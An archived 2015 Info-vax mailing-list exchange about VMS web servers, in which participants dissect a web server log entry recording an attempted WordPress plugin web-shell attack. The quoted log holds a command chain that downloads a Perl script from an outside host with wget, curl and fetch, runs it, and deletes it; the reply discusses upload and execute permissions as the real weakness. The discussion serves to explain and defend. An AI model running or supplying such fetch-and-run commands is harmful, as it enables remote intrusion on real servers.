[Info-vax] Using VMS for a web server

Tue Jun 9 17:08:44 EDT 2015

Bill Gunshannon skrev den 2015-06-09 16:49:
> In article <ml6qf1$d82$1 at news.albasani.net>,
> 	Jan-Erik Soderholm <jan-erik.soderholm at telia.com> writes:
>>
>>
>> It would be nice to have a reproducer and test it out.
>> Or at least a pointer to a description.
>>
> ....
>>
>> OK. I have only read quite a lot about PHP and it's "problems"
>> but never used it or had it installed on any server.
>>
>> But it would surprice me *a lot* if there wasn't an available
>> fix for a simple URL based exploit...
>
> OK, I wasn't busy (some of these updates are like watching paint dry!)
> so here is just one to look at.
>
> First, a log entry (sanatized a bit as I don't really need someone else
> trying this):
>
> 103.14.141.213 - - [14/Mar/2015:20:36:36 -0400] "GET /wp-content/plugins/revslider/temp/update_extract/revslider/wawalo.php?cmd=wget%20http://identerprise.co.kr/css/qtalk.txt;curl%20-O%20http://identerprise.co.kr/css/qtalk.txt;fetch%20http://identerprise.co.kr/css/b.txt;perl%20qtalk.txt;rm%20-rf%20qtalk.txt* HTTP/1.1" 404 267 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
>
>
> Now, let's pull out the applicable part:
>
> "GET /wp-content/plugins/revslider/temp/update_extract/revslider/wawalo.php?cmd=wget%20http://identerprise.co.kr/css/qtalk.txt;curl%20-O%20http://identerprise.co.kr/css/qtalk.txt;fetch%20http://identerprise.co.kr/css/b.txt;perl%20qtalk.txt;rm%20-rf%20qtalk.txt* HTTP/1.1"
>
> Now we analyze it:
>
> "GET /xxxxxxxxxx/xxxxxxx/revslider/temp/update_extract/revslider/XXXXXX.php
>
> There is a request to get a PHP script.
>
> Note immedately after this part is "?cmd="        Hmmmmmm......
>
> And what is the command?
>
> wget%20http://identerprise.co.kr/css/qtalk.txt;curl%20-O%20http://identerprise.c
> o.kr/css/qtalk.txt;fetch%20http://identerprise.co.kr/css/b.txt;perl%20qtalk.txt;
> rm%20-rf%20qtalk.txt*
>
> And if we break it down:
>
> wget%20http://identerprise.co.kr/css/qtalk.txt;
>
> curl%20-O%20http://identerprise.co.kr/css/qtalk.txt;
>
> fetch%20http://identerprise.co.kr/css/b.txt;
>
> perl%20qtalk.txt;
>
> rm%20-rf%20qtalk.txt*
>
>
> So, the attacker uses a hole in PHP to download a Perl script, using three
> common ways of doing it (I don't know if any of these are available on VMS
> but I suspect curl or wget might be).  He then runs it.  And when he is done
> he cleans up his tracks.
>
> What does it do?  No idea.  The point is to show something that PHP allows
> as a "feature" that makes it probably the worst possible web scripting
> language.
>
> I have seen this method used to download a telnet daemon written in either
> PHP or Perl.  This allows outsiders who do not have an account on a system
> to get in for a look around.  Good way to look security shortcomings.
>
> bill
>

OK. That needs a script called wawalo.php already beeing on the server
in a directory where the server can execute it. The exploit is realy
to be able to upload the wawalo.php file in the first place.

If you have a server setup where someone can both upload a random
file and then also execute that file just like that frm the same
directory, you have a severe problem.

Now, is this a "hole in PHP"? Or could the same thing be done
using any tool that can take an input parameter and execute it?

I guess any scripting tool could be used to write such a script.
Many scripting languages are able to take a string and execute it.

Can this be done on an WASD/VMS server? Not if you do not have
file upload enabled, at least. And you also need execute rights
on the upload directory. You can also set it up so thet PHP
script can only be executed from a safe "script" directory
with no external write access.

But again, is it realy a "hole in PHP" ?? I'm not sure...

Jan-Erik.